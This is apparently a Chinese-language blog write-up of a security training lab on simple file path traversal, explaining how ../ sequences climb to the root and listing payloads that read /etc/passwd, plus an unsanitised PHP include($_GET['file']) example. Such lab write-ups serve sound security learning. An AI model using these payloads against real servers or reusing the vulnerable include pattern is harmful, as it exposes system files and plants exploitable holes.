实验:文件路径遍历,简单情况(Lab: File path traversal, simple case)

该实验室在产品图像显示方面存在路径遍历漏洞。

要完成实验,请检索文件内容/etc/passwd

一、/etc/passwd 在哪里?

Linux 系统的绝对路径就是:

复制代码
/etc/passwd

它位于根目录 / 下的 etc 目录中。

Linux 目录结构大概是:

复制代码
/
├── bin
├── boot
├── dev
├── etc
│   ├── passwd
│   ├── shadow
│   └── hosts
├── home
├── root
├── tmp
├── usr
└── var

所以:

复制代码
/etc/passwd

就是一个固定的位置。


二、为什么目录遍历能够访问它?

假设网站代码:

复制代码
include($_GET['file']);

正常访问:

复制代码
http://example.com/?file=images/logo.png

实际上服务器访问的是

复制代码
/var/www/html/images/logo.png

如果没有做限制,你可以利用

复制代码
../

返回上一级目录。

例如:

复制代码
images/logo.png

变成

复制代码
../

表示:

复制代码
/var/www/html/
      ↑
../

继续:

复制代码
../../

表示:

复制代码
/var/www/
      ↑
../

不断往上:

复制代码
../../../

最后会到:

复制代码
/

然后再进入

复制代码
etc/passwd

于是形成

复制代码
../../../../etc/passwd

三、怎么知道要几个 ../

这就是很多人刚学目录遍历时最疑惑的地方。

例如网站根目录:

复制代码
/var/www/html/

需要:

复制代码
html
 ↑
../

www
 ↑
../

var
 ↑
../

/

所以:

复制代码
../../../etc/passwd

即可。

如果程序位于

复制代码
/opt/tomcat/webapps/app/images/

那就需要更多:

复制代码
../../../../../etc/passwd

四、真实测试时怎么办?

通常不知道程序当前目录

因此会逐步尝试,例如:

复制代码
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd

很多 CTF 或实验环境都是这样验证目录遍历是否存在。


五、为什么多写几个 ../ 也能成功?

Linux 文件系统规定:

当已经到达根目录 / 后:

复制代码
/
↑
../

仍然还是

复制代码
/

例如:

复制代码
../../../../../../../../etc/passwd

最终仍然会解析为:

复制代码
/etc/passwd

所以在不少实验环境中,会看到故意写很多层 ../


六、目录遍历的核心原理

假设服务器当前目录:

复制代码
/var/www/html/images/

请求:

复制代码
../../../etc/passwd

解析过程:

复制代码
/var/www/html/images/
        │
        ├── ..
        │
/var/www/html/
        │
        ├── ..
        │
/var/www/
        │
        ├── ..
        │
/
        │
        └── etc/passwd

最终访问:

复制代码
/etc/passwd

七、实验过程

先放行图片的访问

在图片我们可以得到完整的图片路径是

复制代码
https://0afd0035031ad62f81501719005800bf.web-security-academy.net/resources/images/rating5.png

也就是说我们只需要三个../即可到达根目录访问/etc/passwd

然后再去刷新攻击页面重新拦截图片的获取的URL并重放后更改URL发送

相关推荐
ze^07 小时前
【软考信息安全】第2章 网络攻击原理与常用方法
网络·web安全·网络安全
数据知道10 小时前
反序列化漏洞:Java、PHP、Python 三条线各讲透
java·网络·python·安全·网络安全·php
菩提小狗12 小时前
每日安全情报报告 · 2026-08-12
网络安全·漏洞·cve·安全情报·每日安全
数据知道17 小时前
XXE 漏洞深度实战:XML 外部实体攻击与 OOB 带外
xml·网络·安全·网络安全
Raas10017 小时前
MAIGateway,魔芋企业级AI网关的安全基建化设计
大数据·人工智能·网关·网络安全·api网关·mai gateway·魔芋
笨鸟先飞,勤能补拙18 小时前
AI Agent应用领域深度解析:从概念到落地的全维度审视
大数据·人工智能·python·物联网·安全·网络安全·github
Sombra_Olivia18 小时前
复现Windows Server服务RPC请求缓冲区溢出漏洞(MS08067)
网络·windows·安全·web安全·网络安全·渗透测试·vulhub
数据知道19 小时前
网络安全实战:API 安全攻防——RESTful 接口渗透测试方法论
网络·安全·web安全·网络安全·restful
2501_915921431 天前
抓包鹰 Traceeagle 解除证书绑定,SSL Pinning 解除
网络·网络协议·网络安全·ios·adb·https·ssl
小绫网络安全2 天前
【每日一讲】Pikachu漏洞练习靶场
网络·web安全·网络安全·靶场·pikachu